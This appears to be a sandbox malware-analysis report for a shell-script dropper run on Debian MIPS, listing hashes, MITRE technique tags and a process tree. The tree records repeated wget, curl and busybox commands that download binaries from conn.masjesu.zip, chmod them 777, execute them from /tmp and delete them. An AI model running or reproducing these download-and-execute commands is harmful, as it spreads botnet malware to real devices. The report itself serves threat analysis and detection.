Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
-
Size
10KB
-
MD5
5ad9fce74e2c2c2bc17e1c3c7c1e9699
-
SHA1
f6a06bb0801544767f9542e687c8970f4da13169
-
SHA256
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
-
SHA512
70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
-
SSDEEP
192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 21 IoCs
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:708
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:730
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:734
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:761
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:792
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:812
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:895
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:900
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:916
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:935
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:953
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97